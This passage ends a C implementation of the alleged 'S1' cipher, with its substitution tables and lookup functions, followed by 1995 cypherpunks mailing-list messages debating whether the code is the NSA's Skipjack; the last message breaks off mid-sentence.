	F[2][55] = 06;
	F[2][56] = 011;
	F[2][57] = 016;
	F[2][58] = 015;
	F[2][59] = 06;
	F[2][60] = 07;
	F[2][61] = 05;
	F[2][62] = 014;
	F[2][63] = 07;
	F[2][64] = 01;
	F[2][65] = 06;
	F[2][66] = 012;
	F[2][67] = 06;
	F[2][68] = 05;
	F[2][69] = 04;
	F[2][70] = 03;
	F[2][71] = 011;
	F[2][72] = 04;
	F[2][73] = 014;
	F[2][74] = 013;
	F[2][75] = 00;
	F[2][76] = 010;
	F[2][77] = 016;
	F[2][78] = 03;
	F[2][79] = 06;
	F[2][80] = 00;
	F[2][81] = 017;
	F[2][82] = 02;
	F[2][83] = 010;
	F[2][84] = 010;
	F[2][85] = 012;
	F[2][86] = 012;
	F[2][87] = 017;
	F[2][88] = 07;
	F[2][89] = 03;
	F[2][90] = 012;
	F[2][91] = 012;
	F[2][92] = 013;
	F[2][93] = 014;
	F[2][94] = 013;
	F[2][95] = 03;
	F[2][96] = 011;
	F[2][97] = 012;
	F[2][98] = 06;
	F[2][99] = 02;
	F[2][100] = 02;
	F[2][101] = 02;
	F[2][102] = 011;
	F[2][103] = 04;
	F[2][104] = 06;
	F[2][105] = 010;
	F[2][106] = 05;
	F[2][107] = 01;
	F[2][108] = 016;
	F[2][109] = 07;
	F[2][110] = 017;
	F[2][111] = 00;
	F[2][112] = 013;
	F[2][113] = 012;
	F[2][114] = 016;
	F[2][115] = 07;
	F[2][116] = 016;
	F[2][117] = 01;
	F[2][118] = 04;
	F[2][119] = 015;
	F[2][120] = 07;
	F[2][121] = 014;
	F[2][122] = 00;
	F[2][123] = 04;
	F[2][124] = 06;
	F[2][125] = 016;
	F[2][126] = 011;
	F[2][127] = 014;
	F[2][128] = 06;
	F[2][129] = 011;
	F[2][130] = 012;
	F[2][131] = 02;
	F[2][132] = 012;
	F[2][133] = 016;
	F[2][134] = 013;
	F[2][135] = 00;
	F[2][136] = 00;
	F[2][137] = 03;
	F[2][138] = 03;
	F[2][139] = 015;
	F[2][140] = 07;
	F[2][141] = 012;
	F[2][142] = 00;
	F[2][143] = 012;
	F[2][144] = 017;
	F[2][145] = 011;
	F[2][146] = 05;
	F[2][147] = 05;
	F[2][148] = 010;
	F[2][149] = 04;
	F[2][150] = 04;
	F[2][151] = 05;
	F[2][152] = 014;
	F[2][153] = 012;
	F[2][154] = 011;
	F[2][155] = 015;
	F[2][156] = 015;
	F[2][157] = 013;
	F[2][158] = 017;
	F[2][159] = 014;
	F[2][160] = 011;
	F[2][161] = 07;
	F[2][162] = 013;
	F[2][163] = 01;
	F[2][164] = 00;
	F[2][165] = 015;
	F[2][166] = 011;
	F[2][167] = 05;
	F[2][168] = 015;
	F[2][169] = 016;
	F[2][170] = 012;
	F[2][171] = 017;
	F[2][172] = 01;
	F[2][173] = 015;
	F[2][174] = 07;
	F[2][175] = 012;
	F[2][176] = 010;
	F[2][177] = 017;
	F[2][178] = 07;
	F[2][179] = 04;
	F[2][180] = 011;
	F[2][181] = 013;
	F[2][182] = 01;
	F[2][183] = 010;
	F[2][184] = 06;
	F[2][185] = 03;
	F[2][186] = 010;
	F[2][187] = 02;
	F[2][188] = 05;
	F[2][189] = 010;
	F[2][190] = 011;
	F[2][191] = 02;
	F[2][192] = 04;
	F[2][193] = 017;
	F[2][194] = 012;
	F[2][195] = 06;
	F[2][196] = 05;
	F[2][197] = 05;
	F[2][198] = 015;
	F[2][199] = 012;
	F[2][200] = 00;
	F[2][201] = 03;
	F[2][202] = 04;
	F[2][203] = 015;
	F[2][204] = 016;
	F[2][205] = 015;
	F[2][206] = 015;
	F[2][207] = 011;
	F[2][208] = 03;
	F[2][209] = 05;
	F[2][210] = 013;
	F[2][211] = 016;
	F[2][212] = 02;
	F[2][213] = 017;
	F[2][214] = 013;
	F[2][215] = 00;
	F[2][216] = 03;
	F[2][217] = 012;
	F[2][218] = 02;
	F[2][219] = 07;
	F[2][220] = 03;
	F[2][221] = 010;
	F[2][222] = 011;
	F[2][223] = 01;
	F[2][224] = 06;
	F[2][225] = 02;
	F[2][226] = 014;
	F[2][227] = 01;
	F[2][228] = 012;
	F[2][229] = 010;
	F[2][230] = 02;
	F[2][231] = 012;
	F[2][232] = 013;
	F[2][233] = 017;
	F[2][234] = 013;
	F[2][235] = 014;
	F[2][236] = 05;
	F[2][237] = 02;
	F[2][238] = 02;
	F[2][239] = 013;
	F[2][240] = 011;
	F[2][241] = 013;
	F[2][242] = 02;
	F[2][243] = 05;
	F[2][244] = 014;
	F[2][245] = 017;
	F[2][246] = 06;
	F[2][247] = 015;
	F[2][248] = 01;
	F[2][249] = 011;
	F[2][250] = 012;
	F[2][251] = 00;
	F[2][252] = 013;
	F[2][253] = 05;
	F[2][254] = 03;
	F[2][255] = 015;
	F[3][0] = 013;
	F[3][1] = 07;
	F[3][2] = 04;
	F[3][3] = 01;
	F[3][4] = 03;
	F[3][5] = 017;
	F[3][6] = 07;
	F[3][7] = 05;
	F[3][8] = 014;
	F[3][9] = 02;
	F[3][10] = 05;
	F[3][11] = 016;
	F[3][12] = 013;
	F[3][13] = 04;
	F[3][14] = 013;
	F[3][15] = 01;
	F[3][16] = 015;
	F[3][17] = 015;
	F[3][18] = 014;
	F[3][19] = 015;
	F[3][20] = 01;
	F[3][21] = 010;
	F[3][22] = 04;
	F[3][23] = 02;
	F[3][24] = 07;
	F[3][25] = 015;
	F[3][26] = 016;
	F[3][27] = 016;
	F[3][28] = 01;
	F[3][29] = 03;
	F[3][30] = 011;
	F[3][31] = 011;
	F[3][32] = 010;
	F[3][33] = 017;
	F[3][34] = 06;
	F[3][35] = 04;
	F[3][36] = 013;
	F[3][37] = 010;
	F[3][38] = 014;
	F[3][39] = 013;
	F[3][40] = 03;
	F[3][41] = 010;
	F[3][42] = 015;
	F[3][43] = 07;
	F[3][44] = 07;
	F[3][45] = 00;
	F[3][46] = 05;
	F[3][47] = 01;
	F[3][48] = 03;
	F[3][49] = 013;
	F[3][50] = 015;
	F[3][51] = 04;
	F[3][52] = 017;
	F[3][53] = 015;
	F[3][54] = 03;
	F[3][55] = 017;
	F[3][56] = 013;
	F[3][57] = 03;
	F[3][58] = 013;
	F[3][59] = 011;
	F[3][60] = 00;
	F[3][61] = 010;
	F[3][62] = 01;
	F[3][63] = 07;
	F[3][64] = 03;
	F[3][65] = 04;
	F[3][66] = 04;
	F[3][67] = 03;
	F[3][68] = 03;
	F[3][69] = 010;
	F[3][70] = 016;
	F[3][71] = 00;
	F[3][72] = 01;
	F[3][73] = 011;
	F[3][74] = 015;
	F[3][75] = 02;
	F[3][76] = 013;
	F[3][77] = 03;
	F[3][78] = 07;
	F[3][79] = 010;
	F[3][80] = 010;
	F[3][81] = 07;
	F[3][82] = 014;
	F[3][83] = 015;
	F[3][84] = 013;
	F[3][85] = 05;
	F[3][86] = 00;
	F[3][87] = 012;
	F[3][88] = 012;
	F[3][89] = 016;
	F[3][90] = 07;
	F[3][91] = 02;
	F[3][92] = 017;
	F[3][93] = 06;
	F[3][94] = 017;
	F[3][95] = 015;
	F[3][96] = 013;
	F[3][97] = 02;
	F[3][98] = 03;
	F[3][99] = 013;
	F[3][100] = 01;
	F[3][101] = 02;
	F[3][102] = 017;
	F[3][103] = 06;
	F[3][104] = 04;
	F[3][105] = 07;
	F[3][106] = 04;
	F[3][107] = 017;
	F[3][108] = 03;
	F[3][109] = 03;
	F[3][110] = 02;
	F[3][111] = 00;
	F[3][112] = 05;
	F[3][113] = 01;
	F[3][114] = 00;
	F[3][115] = 016;
	F[3][116] = 014;
	F[3][117] = 05;
	F[3][118] = 02;
	F[3][119] = 04;
	F[3][120] = 07;
	F[3][121] = 014;
	F[3][122] = 07;
	F[3][123] = 012;
	F[3][124] = 05;
	F[3][125] = 017;
	F[3][126] = 011;
	F[3][127] = 01;
	F[3][128] = 06;
	F[3][129] = 00;
	F[3][130] = 015;
	F[3][131] = 014;
	F[3][132] = 017;
	F[3][133] = 01;
	F[3][134] = 00;
	F[3][135] = 04;
	F[3][136] = 00;
	F[3][137] = 00;
	F[3][138] = 011;
	F[3][139] = 04;
	F[3][140] = 013;
	F[3][141] = 012;
	F[3][142] = 03;
	F[3][143] = 015;
	F[3][144] = 01;
	F[3][145] = 05;
	F[3][146] = 04;
	F[3][147] = 02;
	F[3][148] = 011;
	F[3][149] = 07;
	F[3][150] = 00;
	F[3][151] = 011;
	F[3][152] = 015;
	F[3][153] = 011;
	F[3][154] = 00;
	F[3][155] = 05;
	F[3][156] = 07;
	F[3][157] = 016;
	F[3][158] = 017;
	F[3][159] = 02;
	F[3][160] = 05;
	F[3][161] = 013;
	F[3][162] = 06;
	F[3][163] = 04;
	F[3][164] = 06;
	F[3][165] = 01;
	F[3][166] = 013;
	F[3][167] = 04;
	F[3][168] = 06;
	F[3][169] = 015;
	F[3][170] = 010;
	F[3][171] = 012;
	F[3][172] = 03;
	F[3][173] = 010;
	F[3][174] = 017;
	F[3][175] = 013;
	F[3][176] = 011;
	F[3][177] = 010;
	F[3][178] = 07;
	F[3][179] = 00;
	F[3][180] = 014;
	F[3][181] = 03;
	F[3][182] = 05;
	F[3][183] = 00;
	F[3][184] = 013;
	F[3][185] = 016;
	F[3][186] = 013;
	F[3][187] = 014;
	F[3][188] = 01;
	F[3][189] = 02;
	F[3][190] = 016;
	F[3][191] = 06;
	F[3][192] = 012;
	F[3][193] = 016;
	F[3][194] = 014;
	F[3][195] = 03;
	F[3][196] = 04;
	F[3][197] = 06;
	F[3][198] = 00;
	F[3][199] = 017;
	F[3][200] = 00;
	F[3][201] = 014;
	F[3][202] = 05;
	F[3][203] = 016;
	F[3][204] = 01;
	F[3][205] = 01;
	F[3][206] = 04;
	F[3][207] = 03;
	F[3][208] = 01;
	F[3][209] = 010;
	F[3][210] = 00;
	F[3][211] = 013;
	F[3][212] = 010;
	F[3][213] = 03;
	F[3][214] = 015;
	F[3][215] = 03;
	F[3][216] = 07;
	F[3][217] = 017;
	F[3][218] = 014;
	F[3][219] = 012;
	F[3][220] = 06;
	F[3][221] = 01;
	F[3][222] = 01;
	F[3][223] = 03;
	F[3][224] = 00;
	F[3][225] = 06;
	F[3][226] = 012;
	F[3][227] = 05;
	F[3][228] = 05;
	F[3][229] = 06;
	F[3][230] = 07;
	F[3][231] = 010;
	F[3][232] = 017;
	F[3][233] = 016;
	F[3][234] = 01;
	F[3][235] = 05;
	F[3][236] = 00;
	F[3][237] = 016;
	F[3][238] = 00;
	F[3][239] = 00;
	F[3][240] = 014;
	F[3][241] = 017;
	F[3][242] = 010;
	F[3][243] = 00;
	F[3][244] = 06;
	F[3][245] = 012;
	F[3][246] = 011;
	F[3][247] = 016;
	F[3][248] = 017;
	F[3][249] = 017;
	F[3][250] = 03;
	F[3][251] = 03;
	F[3][252] = 014;
	F[3][253] = 00;
	F[3][254] = 015;
	F[3][255] = 017;
	/* PSEUDO-LINEAR (G0, G1) */
	G[0][0] = 00;
	G[0][1] = 00;
	G[0][2] = 01;
	G[0][3] = 01;
	G[0][4] = 00;
	G[0][5] = 01;
	G[0][6] = 01;
	G[0][7] = 00;
	G[0][8] = 00;
	G[0][9] = 01;
	G[0][10] = 00;
	G[0][11] = 00;
	G[0][12] = 01;
	G[0][13] = 01;
	G[0][14] = 00;
	G[0][15] = 01;
	G[0][16] = 01;
	G[0][17] = 00;
	G[0][18] = 00;
	G[0][19] = 01;
	G[0][20] = 00;
	G[0][21] = 00;
	G[0][22] = 01;
	G[0][23] = 01;
	G[0][24] = 00;
	G[0][25] = 01;
	G[0][26] = 01;
	G[0][27] = 00;
	G[0][28] = 00;
	G[0][29] = 01;
	G[0][30] = 00;
	G[0][31] = 00;
	G[0][32] = 01;
	G[0][33] = 01;
	G[0][34] = 00;
	G[0][35] = 01;
	G[0][36] = 01;
	G[0][37] = 00;
	G[0][38] = 00;
	G[0][39] = 01;
	G[0][40] = 00;
	G[0][41] = 00;
	G[0][42] = 01;
	G[0][43] = 01;
	G[0][44] = 00;
	G[0][45] = 01;
	G[0][46] = 01;
	G[0][47] = 00;
	G[0][48] = 00;
	G[0][49] = 01;
	G[0][50] = 00;
	G[0][51] = 00;
	G[0][52] = 01;
	G[0][53] = 01;
	G[0][54] = 00;
	G[0][55] = 01;
	G[0][56] = 01;
	G[0][57] = 00;
	G[0][58] = 00;
	G[0][59] = 01;
	G[0][60] = 00;
	G[0][61] = 00;
	G[0][62] = 01;
	G[0][63] = 01;
	G[0][64] = 00;
	G[0][65] = 01;
	G[0][66] = 01;
	G[0][67] = 00;
	G[0][68] = 00;
	G[0][69] = 01;
	G[0][70] = 00;
	G[0][71] = 00;
	G[0][72] = 01;
	G[0][73] = 01;
	G[0][74] = 00;
	G[0][75] = 01;
	G[0][76] = 01;
	G[0][77] = 00;
	G[0][78] = 00;
	G[0][79] = 01;
	G[0][80] = 00;
	G[0][81] = 00;
	G[0][82] = 01;
	G[0][83] = 01;
	G[0][84] = 00;
	G[0][85] = 01;
	G[0][86] = 01;
	G[0][87] = 00;
	G[0][88] = 00;
	G[0][89] = 01;
	G[0][90] = 00;
	G[0][91] = 00;
	G[0][92] = 01;
	G[0][93] = 01;
	G[0][94] = 00;
	G[0][95] = 01;
	G[0][96] = 01;
	G[0][97] = 00;
	G[0][98] = 00;
	G[0][99] = 01;
	G[0][100] = 00;
	G[0][101] = 00;
	G[0][102] = 01;
	G[0][103] = 01;
	G[0][104] = 00;
	G[0][105] = 01;
	G[0][106] = 01;
	G[0][107] = 00;
	G[0][108] = 00;
	G[0][109] = 01;
	G[0][110] = 00;
	G[0][111] = 00;
	G[0][112] = 01;
	G[0][113] = 01;
	G[0][114] = 00;
	G[0][115] = 01;
	G[0][116] = 01;
	G[0][117] = 00;
	G[0][118] = 00;
	G[0][119] = 01;
	G[0][120] = 00;
	G[0][121] = 00;
	G[0][122] = 01;
	G[0][123] = 01;
	G[0][124] = 00;
	G[0][125] = 01;
	G[0][126] = 01;
	G[0][127] = 00;
	G[0][128] = 00;
	G[0][129] = 01;
	G[0][130] = 00;
	G[0][131] = 00;
	G[0][132] = 01;
	G[0][133] = 01;
	G[0][134] = 00;
	G[0][135] = 01;
	G[0][136] = 01;
	G[0][137] = 00;
	G[0][138] = 00;
	G[0][139] = 01;
	G[0][140] = 00;
	G[0][141] = 00;
	G[0][142] = 01;
	G[0][143] = 01;
	G[0][144] = 00;
	G[0][145] = 01;
	G[0][146] = 01;
	G[0][147] = 00;
	G[0][148] = 00;
	G[0][149] = 01;
	G[0][150] = 00;
	G[0][151] = 00;
	G[0][152] = 01;
	G[0][153] = 01;
	G[0][154] = 00;
	G[0][155] = 01;
	G[0][156] = 01;
	G[0][157] = 00;
	G[0][158] = 00;
	G[0][159] = 01;
	G[0][160] = 00;
	G[0][161] = 00;
	G[0][162] = 01;
	G[0][163] = 01;
	G[0][164] = 00;
	G[0][165] = 01;
	G[0][166] = 01;
	G[0][167] = 00;
	G[0][168] = 00;
	G[0][169] = 01;
	G[0][170] = 00;
	G[0][171] = 00;
	G[0][172] = 01;
	G[0][173] = 01;
	G[0][174] = 00;
	G[0][175] = 01;
	G[0][176] = 01;
	G[0][177] = 00;
	G[0][178] = 00;
	G[0][179] = 01;
	G[0][180] = 00;
	G[0][181] = 00;
	G[0][182] = 01;
	G[0][183] = 01;
	G[0][184] = 00;
	G[0][185] = 01;
	G[0][186] = 01;
	G[0][187] = 00;
	G[0][188] = 00;
	G[0][189] = 01;
	G[0][190] = 00;
	G[0][191] = 00;
	G[0][192] = 01;
	G[0][193] = 01;
	G[0][194] = 00;
	G[0][195] = 01;
	G[0][196] = 01;
	G[0][197] = 00;
	G[0][198] = 00;
	G[0][199] = 01;
	G[0][200] = 00;
	G[0][201] = 00;
	G[0][202] = 01;
	G[0][203] = 01;
	G[0][204] = 00;
	G[0][205] = 01;
	G[0][206] = 01;
	G[0][207] = 00;
	G[0][208] = 00;
	G[0][209] = 01;
	G[0][210] = 00;
	G[0][211] = 00;
	G[0][212] = 01;
	G[0][213] = 01;
	G[0][214] = 00;
	G[0][215] = 01;
	G[0][216] = 01;
	G[0][217] = 00;
	G[0][218] = 00;
	G[0][219] = 01;
	G[0][220] = 00;
	G[0][221] = 00;
	G[0][222] = 01;
	G[0][223] = 01;
	G[0][224] = 00;
	G[0][225] = 01;
	G[0][226] = 01;
	G[0][227] = 00;
	G[0][228] = 00;
	G[0][229] = 01;
	G[0][230] = 00;
	G[0][231] = 00;
	G[0][232] = 01;
	G[0][233] = 01;
	G[0][234] = 00;
	G[0][235] = 01;
	G[0][236] = 01;
	G[0][237] = 00;
	G[0][238] = 00;
	G[0][239] = 01;
	G[0][240] = 00;
	G[0][241] = 00;
	G[0][242] = 01;
	G[0][243] = 01;
	G[0][244] = 00;
	G[0][245] = 01;
	G[0][246] = 01;
	G[0][247] = 00;
	G[0][248] = 00;
	G[0][249] = 01;
	G[0][250] = 00;
	G[0][251] = 00;
	G[0][252] = 01;
	G[0][253] = 01;
	G[0][254] = 00;
	G[0][255] = 01;
	G[1][0] = 00;
	G[1][1] = 01;
	G[1][2] = 01;
	G[1][3] = 00;
	G[1][4] = 01;
	G[1][5] = 00;
	G[1][6] = 00;
	G[1][7] = 01;
	G[1][8] = 00;
	G[1][9] = 01;
	G[1][10] = 01;
	G[1][11] = 00;
	G[1][12] = 01;
	G[1][13] = 00;
	G[1][14] = 00;
	G[1][15] = 01;
	G[1][16] = 01;
	G[1][17] = 00;
	G[1][18] = 00;
	G[1][19] = 01;
	G[1][20] = 00;
	G[1][21] = 01;
	G[1][22] = 01;
	G[1][23] = 00;
	G[1][24] = 01;
	G[1][25] = 00;
	G[1][26] = 00;
	G[1][27] = 01;
	G[1][28] = 00;
	G[1][29] = 01;
	G[1][30] = 01;
	G[1][31] = 00;
	G[1][32] = 00;
	G[1][33] = 01;
	G[1][34] = 01;
	G[1][35] = 00;
	G[1][36] = 01;
	G[1][37] = 00;
	G[1][38] = 00;
	G[1][39] = 01;
	G[1][40] = 00;
	G[1][41] = 01;
	G[1][42] = 01;
	G[1][43] = 00;
	G[1][44] = 01;
	G[1][45] = 00;
	G[1][46] = 00;
	G[1][47] = 01;
	G[1][48] = 01;
	G[1][49] = 00;
	G[1][50] = 00;
	G[1][51] = 01;
	G[1][52] = 00;
	G[1][53] = 01;
	G[1][54] = 01;
	G[1][55] = 00;
	G[1][56] = 01;
	G[1][57] = 00;
	G[1][58] = 00;
	G[1][59] = 01;
	G[1][60] = 00;
	G[1][61] = 01;
	G[1][62] = 01;
	G[1][63] = 00;
	G[1][64] = 00;
	G[1][65] = 01;
	G[1][66] = 01;
	G[1][67] = 00;
	G[1][68] = 01;
	G[1][69] = 00;
	G[1][70] = 00;
	G[1][71] = 01;
	G[1][72] = 00;
	G[1][73] = 01;
	G[1][74] = 01;
	G[1][75] = 00;
	G[1][76] = 01;
	G[1][77] = 00;
	G[1][78] = 00;
	G[1][79] = 01;
	G[1][80] = 01;
	G[1][81] = 00;
	G[1][82] = 00;
	G[1][83] = 01;
	G[1][84] = 00;
	G[1][85] = 01;
	G[1][86] = 01;
	G[1][87] = 00;
	G[1][88] = 01;
	G[1][89] = 00;
	G[1][90] = 00;
	G[1][91] = 01;
	G[1][92] = 00;
	G[1][93] = 01;
	G[1][94] = 01;
	G[1][95] = 00;
	G[1][96] = 00;
	G[1][97] = 01;
	G[1][98] = 01;
	G[1][99] = 00;
	G[1][100] = 01;
	G[1][101] = 00;
	G[1][102] = 00;
	G[1][103] = 01;
	G[1][104] = 00;
	G[1][105] = 01;
	G[1][106] = 01;
	G[1][107] = 00;
	G[1][108] = 01;
	G[1][109] = 00;
	G[1][110] = 00;
	G[1][111] = 01;
	G[1][112] = 01;
	G[1][113] = 00;
	G[1][114] = 00;
	G[1][115] = 01;
	G[1][116] = 00;
	G[1][117] = 01;
	G[1][118] = 01;
	G[1][119] = 00;
	G[1][120] = 01;
	G[1][121] = 00;
	G[1][122] = 00;
	G[1][123] = 01;
	G[1][124] = 00;
	G[1][125] = 01;
	G[1][126] = 01;
	G[1][127] = 00;
	G[1][128] = 00;
	G[1][129] = 01;
	G[1][130] = 01;
	G[1][131] = 00;
	G[1][132] = 01;
	G[1][133] = 00;
	G[1][134] = 00;
	G[1][135] = 01;
	G[1][136] = 00;
	G[1][137] = 01;
	G[1][138] = 01;
	G[1][139] = 00;
	G[1][140] = 01;
	G[1][141] = 00;
	G[1][142] = 00;
	G[1][143] = 01;
	G[1][144] = 01;
	G[1][145] = 00;
	G[1][146] = 00;
	G[1][147] = 01;
	G[1][148] = 00;
	G[1][149] = 01;
	G[1][150] = 01;
	G[1][151] = 00;
	G[1][152] = 01;
	G[1][153] = 00;
	G[1][154] = 00;
	G[1][155] = 01;
	G[1][156] = 00;
	G[1][157] = 01;
	G[1][158] = 01;
	G[1][159] = 00;
	G[1][160] = 00;
	G[1][161] = 01;
	G[1][162] = 01;
	G[1][163] = 00;
	G[1][164] = 01;
	G[1][165] = 00;
	G[1][166] = 00;
	G[1][167] = 01;
	G[1][168] = 00;
	G[1][169] = 01;
	G[1][170] = 01;
	G[1][171] = 00;
	G[1][172] = 01;
	G[1][173] = 00;
	G[1][174] = 00;
	G[1][175] = 01;
	G[1][176] = 01;
	G[1][177] = 00;
	G[1][178] = 00;
	G[1][179] = 01;
	G[1][180] = 00;
	G[1][181] = 01;
	G[1][182] = 01;
	G[1][183] = 00;
	G[1][184] = 01;
	G[1][185] = 00;
	G[1][186] = 00;
	G[1][187] = 01;
	G[1][188] = 00;
	G[1][189] = 01;
	G[1][190] = 01;
	G[1][191] = 00;
	G[1][192] = 00;
	G[1][193] = 01;
	G[1][194] = 01;
	G[1][195] = 00;
	G[1][196] = 01;
	G[1][197] = 00;
	G[1][198] = 00;
	G[1][199] = 01;
	G[1][200] = 00;
	G[1][201] = 01;
	G[1][202] = 01;
	G[1][203] = 00;
	G[1][204] = 01;
	G[1][205] = 00;
	G[1][206] = 00;
	G[1][207] = 01;
	G[1][208] = 01;
	G[1][209] = 00;
	G[1][210] = 00;
	G[1][211] = 01;
	G[1][212] = 00;
	G[1][213] = 01;
	G[1][214] = 01;
	G[1][215] = 00;
	G[1][216] = 01;
	G[1][217] = 00;
	G[1][218] = 00;
	G[1][219] = 01;
	G[1][220] = 00;
	G[1][221] = 01;
	G[1][222] = 01;
	G[1][223] = 00;
	G[1][224] = 00;
	G[1][225] = 01;
	G[1][226] = 01;
	G[1][227] = 00;
	G[1][228] = 01;
	G[1][229] = 00;
	G[1][230] = 00;
	G[1][231] = 01;
	G[1][232] = 00;
	G[1][233] = 01;
	G[1][234] = 01;
	G[1][235] = 00;
	G[1][236] = 01;
	G[1][237] = 00;
	G[1][238] = 00;
	G[1][239] = 01;
	G[1][240] = 01;
	G[1][241] = 00;
	G[1][242] = 00;
	G[1][243] = 01;
	G[1][244] = 00;
	G[1][245] = 01;
	G[1][246] = 01;
	G[1][247] = 00;
	G[1][248] = 01;
	G[1][249] = 00;
	G[1][250] = 00;
	G[1][251] = 01;
	G[1][252] = 00;
	G[1][253] = 01;
	G[1][254] = 01;
	G[1][255] = 00;
}


static u_char f(int table, int value)
{
	if ((table<0) || (table>3) || (value<0) || (value>255)) {
		fprintf(stderr,"\n\nF TABLE EXCEPTION %x %x\n\n",table,value);
		exit(1001);
	}
	return F[table][value];
}


static u_char g(int table, int value)
{
	if ((table<0) || (table>2) || (value<0) || (value>255)) {
		fprintf(stderr,"\n\nG TABLE EXCEPTION %x %x\n\n",table,value);
		exit(1001);
	}
	return G[table][value];
}


/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 9 Aug 95 17:59:48 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508092259.PAA10092@jobe.shell.portal.com>
Message-ID: <UAA08495.199508100059@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508092259.PAA10092@jobe.shell.portal.com>, Hal writes:
>I suppose the unstated implication is that this might be Skipjack.

I don't suppose anyone has access to Skipjack to verify or
refute this claim?

[...much intresting analisys deleted...]
>                                           In addition to the points
>mentioned it is curious that the G arrays are initialized with a list of
>256 values rather than taking advantage of the apparent regularities
>noted.

It is fairly simple to cut & paste 10 values ~25 times, it is harder
to write and verify code to initilize the array.

More intresting is that Gx[i % 10] is faster then a stright index
on many systems (anything you could expect cache line conflicts or
cache capacity overfills on, and supports a modulis signifigantly
faster then the first few parts of the memory hierachy).

Also note that the code may have been written from a dissasembled
binary rather then a hardware spec.

[...]
>Hal Finney
>hfinney@shell.portal.com
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 21:05:00 PDT
To: hfinney@shell.portal.com
Subject: Re:  "S1" encryption system
Message-ID: <199508100403.VAA20160@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, yet another correction: the G1 box, G[1][i], is parity(i&0x17),
not parity(i) as I said, where parity is 0 or 1 depending on whether its
argument has an even or odd number of 1 bits.  I have checked via a
small program that this is correct and that the earlier formula I
posted for G0 is correct.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Wed, 9 Aug 95 18:05:40 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508100000.UAA07792@crypto.com>
Message-ID: <9508100105.AA11391@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On a fair number of occassions I have been told that federal type folks
have made statements to the effect that there is no such thing as a "TOP
SECRET" classification of US government docs. Since really secret things
tend to get neither confirmed nor denied, I am inclined to believe this.
Thus SECRET is the top classification in today's government/military. If
anybody knows otherwise I would be interested in the information.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Wed, 9 Aug 95 18:19:47 PDT
To: cypherpunks@toad.com
Subject: Re: this looked like it might be interesting
In-Reply-To: <199508091852.UAA23821@utopia.hacktic.nl>
Message-ID: <m0sgM6l-000vpPC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Hmm.. This is interesting indeed.  It is a 32-round cipher operating
on a 64-bit block.  It has an 80-bit key with a 16-bit cryptographic
checkword.  This seems a lot like a certain hardware-based encryption
system some TLA spooks were pushing about a year ago.

If this isn't Skipjack, someone sure went to a lot of trouble to make
it look like skipjack.  It's also possible that it is an early development
version of what later became Skipjack/Clipper.  It is dated February 1989
and July 1991, which would be consistent with NSA's claim that they had
been working on Skipjack for about 5 years.  It also mentions a "S-2"
revision.  It'd be interesting to try to see if it will interoperate with
a real clipper chip, but I wouldn't bet on it.

Hal Finney noticed that the coding style seems sloppy or amateurish.
This is probably just an attempt by the programmer to hide his tracks.
The RC4 stuff also had unnecessary operations in it, presumably for the
same reason.

Hal also comments on the use of XOR instead of bit permutations as in
DES, and the use of 8-bit table sizes, which would make a software
implementation easier.  This is odd, considering that the algorithm
purports to be designed for hardware.  However, NSA did say that part
of the clipper algorithm was in software, which was designed to be
erased if the chip was tampered with...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 9 Aug 95 18:08:53 PDT
To: solman@mit.edu
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <9508100105.AA11391@ua.MIT.EDU>
Message-ID: <199508100116.VAA08345@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>On a fair number of occassions I have been told that federal type folks
>have made statements to the effect that there is no such thing as a "TOP
>SECRET" classification of US government docs. Since really secret things
>tend to get neither confirmed nor denied, I am inclined to believe this.
>Thus SECRET is the top classification in today's government/military. If
>anybody knows otherwise I would be interested in the information.
>
>JWS

Well, I don't hold (and have never held) a clearance, but I've seen
declasified/sanitized documents that have crossed out "TOP SECRET"
markings all over them.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 21:22:48 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508100421.VAA22301@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of people have indicated that they did not see the original
posting.  I changed the subject heading in my followup.  The original
message was posted under the subject title, "this looked like it might
be interesting".  At least one person had commented on the similarity
to Skipjack which is what prompted me to look at it a little more
closely.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 9 Aug 95 19:37:30 PDT
To: gt7508b@prism.gatech.edu
Subject: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd)
In-Reply-To: <199508100215.WAA05968@acmex.gatech.edu>
Message-ID: <m0sgNPH-001gBTC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


PHrEaK! wrote:
> 
> Forwarded message:
> > On a fair number of occassions I have been told that federal type folks
> > have made statements to the effect that there is no such thing as a "TOP
> > SECRET" classification of US government docs. Since really secret things
> > tend to get neither confirmed nor denied, I am inclined to believe this.
> > Thus SECRET is the top classification in today's government/military. If
> > anybody knows otherwise I would be interested in the information.
> > 
> > JWS
  
> In high school I was in JROTC and was put in charge of security for our
> batallion. I read the army's guides to physical security. These books
> were dated early 80's and late 70's, so the situation might have changed, 
> but I doubt it. They denoted three information security clearance levels.
> CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
